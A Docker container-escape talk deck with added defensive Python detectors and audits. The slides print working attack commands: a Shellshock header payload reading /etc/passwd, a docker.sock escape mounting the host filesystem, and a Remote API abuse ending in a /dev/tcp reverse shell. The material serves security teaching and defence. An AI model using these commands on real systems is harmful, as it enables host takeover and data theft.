
Demystifying Container Escapes


In this OWASP/Null Delhi session, I discussed the docker attack surface. Furthermore, I demonstrated how an attacker can escape the docker container and gain access to the host machine.

Ref: https://null.co.in/events/655-delhi-combined-null-delhi-owasp-delhi-meetup

Published in: Software


  1. Vaibhav Gupta (Twitter: @VaibhavGupta_1). It's all about Docker!
  2. Agenda:
     - About Docker: 1 min primer
     - Cgroups & Namespaces: quick demo
     - Docker attack surface:
         1. Exploiting vulnerable images
         2. The Docker --privileged flag
         3. Privilege escalation using docker.sock
         4. Abusing the Docker Remote API
  3. About Docker
     - Docker is just a way of running processes with limited privileges.
     - Demo:
         docker run -it ubuntu sh
         ps aux | grep sleep
  4. Cgroups & Namespaces
     - Cgroups demo (pids limit):
         docker run -itd --pids-limit 5 alpine
         sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10
     - Namespaces demo (e.g. user namespaces):
         vi /tmp/root-file.txt
         docker run -itd -v /tmp:/shared alpine
         Edit the file within the container
     - Mitigation:
         sudo dockerd --userns-remap=default
  5. DOCKER ATTACK SURFACE
  6. Attack surface:
     - Vulnerable images
     - Containers running with unintended privileges
     - Docker daemon misconfigurations
     - Unauthenticated Docker client Remote API
     - Misconfigured or vulnerable hosts
     - Insecure registry
     - Backdoored images
     - ??
  7. EXPLOITING VULNERABLE IMAGES
     - Sample vulnerable app:
         docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271
     - Exploitation:
         curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi-bin/vulnerable
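The Shellshock (CVE-2014-6271) payload on slide 7 arrives in an HTTP header, so the defender-side counterpart is spotting it in web server logs. The following is an added example, not part of the slides: it parses combined-format access-log lines (constructed here; the log lines, IPs and paths are made up) and returns the entries whose User-Agent or Referer carries the `() { ... };` function-definition signature.

```python
import re

# Apache/nginx "combined" log format; the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# CVE-2014-6271 signature: an exported function definition "() { ... }"
# followed by a trailing command after the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return the parsed entries whose User-Agent or Referer carries a Shellshock payload."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        if SHELLSHOCK_RE.search(entry["ua"]) or SHELLSHOCK_RE.search(entry["referer"]):
            hits.append(entry)
    return hits


# Constructed sample log: line 1 is the slide's payload, line 2 is benign,
# line 3 is a variant without inner whitespace.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2019:10:01:02 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.0.0.7 - - [12/May/2019:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/May/2019:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "() { :;}; /usr/bin/id"
"""

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]} ua={hit["ua"]!r}')
```

Access logs normally record only the User-Agent and Referer, so a payload sent in another header (Cookie, a custom header) will not show up here; a WAF or reverse proxy that inspects all request headers is the place for that. The real fix for the image on the slide is a patched bash, i.e. rebuilding the image on a current base.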
  8. Privilege escalation using docker.sock
     - Some containers require /var/run/docker.sock to be mounted into them.
     - It is required when the container needs to interact with the host's Docker daemon, e.g. a "Dockerized" host monitoring application.
     - Demo:
         docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
         docker exec -it <id> sh
         apk update
         apk add -U docker
         docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
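Slides 4 and 8 together list the container settings that matter for escapes: a mounted docker.sock or host root, `--privileged`, missing pids limits, and added capabilities. The following audit is an added example, not code from the talk: it reads the JSON array that `docker inspect` prints and reports those settings per container. The two inspect records are constructed and trimmed to the keys the audit uses (`HostConfig.Privileged`, `Binds`, `Mounts`, `PidMode`, `NetworkMode`, `CapAdd`, `PidsLimit`, `Config.User`); the container names and ids are made up.

```python
import json

# Host paths that should not be bind-mounted into an untrusted container: "/"
# exposes the whole host filesystem, docker.sock lets the container drive the
# daemon (the escape on slide 8), the rest expose host or kernel configuration.
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock", "/run/docker.sock",
                        "/etc", "/proc", "/sys", "/dev"}
# Capabilities whose addition materially weakens container isolation.
RISKY_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH",
              "NET_ADMIN", "NET_RAW"}


def _cap_name(cap):
    """Normalise 'cap_sys_admin' / 'SYS_ADMIN' to 'SYS_ADMIN'."""
    cap = cap.upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit_container(info):
    """Return a list of risk findings for one 'docker inspect' entry."""
    findings = []
    hc = info.get("HostConfig") or {}
    if hc.get("Privileged"):
        findings.append("privileged: all capabilities and host devices available")
    # Binds covers the -v host:container syntax; Mounts also covers --mount.
    sources = {b.split(":")[0] for b in hc.get("Binds") or []}
    sources |= {m.get("Source", "") for m in info.get("Mounts") or []
                if m.get("Type") == "bind"}
    for src in sorted(sources):
        if src in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path mounted: {src}")
    if hc.get("PidMode") == "host":
        findings.append("shares host PID namespace")
    if hc.get("NetworkMode") == "host":
        findings.append("shares host network namespace")
    added = {_cap_name(c) for c in hc.get("CapAdd") or []}
    for cap in sorted(added & RISKY_CAPS):
        findings.append(f"added capability: {cap}")
    if not hc.get("PidsLimit"):          # 0 or null means unlimited
        findings.append("no --pids-limit set (fork-bomb risk)")
    user = (info.get("Config") or {}).get("User") or ""
    if user.split(":")[0] in ("", "root", "0"):
        findings.append("runs as root inside the container")
    return findings


def audit_inspect_output(text):
    """Map container name -> findings for the JSON array that 'docker inspect' prints."""
    return {c.get("Name", "?").lstrip("/"): audit_container(c) for c in json.loads(text)}


# Constructed, trimmed-down 'docker inspect' output for two hypothetical
# containers; real output has many more keys, which the audit ignores.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "0000000000000000000000000000000000000000000000000000000000000001",
        "Name": "/monitor",
        "Config": {"User": ""},
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/var/run/docker.sock:/var/run/docker.sock", "/:/host:ro"],
            "PidMode": "host", "NetworkMode": "bridge",
            "CapAdd": ["SYS_ADMIN"], "CapDrop": None, "PidsLimit": 0,
        },
        "Mounts": [
            {"Type": "bind", "Source": "/var/run/docker.sock",
             "Destination": "/var/run/docker.sock", "RW": True},
            {"Type": "bind", "Source": "/", "Destination": "/host", "RW": False},
        ],
    },
    {
        "Id": "0000000000000000000000000000000000000000000000000000000000000002",
        "Name": "/web",
        "Config": {"User": "10001:10001"},
        "HostConfig": {
            "Privileged": False,
            "Binds": ["/srv/web/static:/usr/share/nginx/html:ro"],
            "PidMode": "", "NetworkMode": "bridge",
            "CapAdd": None, "CapDrop": ["ALL"], "PidsLimit": 100,
        },
        "Mounts": [
            {"Type": "bind", "Source": "/srv/web/static",
             "Destination": "/usr/share/nginx/html", "RW": False},
        ],
    },
])

if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name, "->", findings or ["no findings"])
```

On a real host, feed it `docker inspect $(docker ps -q)`. Note that a read-only docker.sock mount (`:ro`) is still reported: the mount flag only affects the filesystem node, and the daemon behind the socket still accepts requests, so `ro` is not a mitigation for the escape on slide 8.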
  9. Abusing the Docker Remote API
     - Allows interacting with a remote Docker daemon.
     - No authentication required by default.
     - Let's gain a shell!
         sudo apt install jq
         sudo vi /lib/systemd/system/docker.service
         ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
         sudo systemctl daemon-reload
         sudo service docker restart
         curl http://localhost:2375/containers/json | jq
         docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
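The `ExecStart` line on slide 9 is the exact misconfiguration to look for: a `tcp://` listener with no `--tlsverify`. The following check is an added example, not from the talk: it extracts `-H`/`--host` and `--tlsverify` from a systemd unit's `ExecStart=` line (or the `hosts`/`tlsverify` keys of `/etc/docker/daemon.json`) and flags every TCP listener that is reachable without client-certificate authentication. The unit fragments and daemon.json are constructed; the certificate paths in the hardened unit follow the Docker TLS documentation's layout and are assumed.

```python
import json
import shlex


def _parse_dockerd_args(argv):
    """Pull listen addresses and the --tlsverify switch out of a dockerd argv."""
    hosts, tlsverify = [], False
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("--host=") or arg.startswith("-H="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return hosts, tlsverify


def hosts_from_unit(unit_text):
    """Read -H/--host and --tlsverify from the ExecStart= line of a systemd unit."""
    for line in unit_text.splitlines():
        line = line.strip()
        if line.startswith("ExecStart="):
            return _parse_dockerd_args(shlex.split(line[len("ExecStart="):]))
    return [], False


def hosts_from_daemon_json(text):
    """Same information from daemon.json ('hosts' and 'tlsverify' keys)."""
    cfg = json.loads(text)
    return list(cfg.get("hosts") or []), bool(cfg.get("tlsverify", False))


def assess(hosts, tlsverify):
    """Flag every TCP listener that is reachable without client-certificate auth."""
    findings = []
    for h in hosts:
        if h.startswith("tcp://") and not tlsverify:
            findings.append(f"unauthenticated TCP listener: {h}")
    return findings


# Constructed unit fragments. WEAK_UNIT is the ExecStart line from slide 9;
# HARDENED_UNIT uses the Docker docs' TLS layout (cert paths assumed).
WEAK_UNIT = """\
[Service]
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
"""
HARDENED_UNIT = """\
[Service]
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2376 --tlsverify --tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem
"""
# Constructed daemon.json with the same weak setting expressed as config keys.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

if __name__ == "__main__":
    for label, unit in (("weak", WEAK_UNIT), ("hardened", HARDENED_UNIT)):
        print(label, "->", assess(*hosts_from_unit(unit)) or ["no findings"])
    print("daemon.json ->", assess(*hosts_from_daemon_json(WEAK_DAEMON_JSON)))
```

Two caveats a practitioner will hit: dockerd refuses to start if `hosts` is set both as a flag in the unit and in daemon.json, so check whichever one is actually in use; and `--tlsverify` only raises the bar to "anyone holding a client certificate", who still has root-equivalent access to the host exactly as slide 9 shows, so the listener should also be firewalled to the hosts that need it.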
  10. Linux capabilities
     - docker run -itd alpine
     - docker run --rm -it --cap-drop=NET_RAW alpine sh
     - ping 127.0.0.1 -c 2
     - Printing capabilities: capsh --print
  11. References
     - https://docs.docker.com/engine/security/security/
     - https://docs.docker.com/engine/security/userns-remap/
     - https://securityboulevard.com/2019/02/abusing-docker-api-socket/
  12. Contact
     - Email: Vaibhav.Gupta @ owasp.org
     - Twitter: @VaibhavGupta_1
     - Blog: https://exploits.work
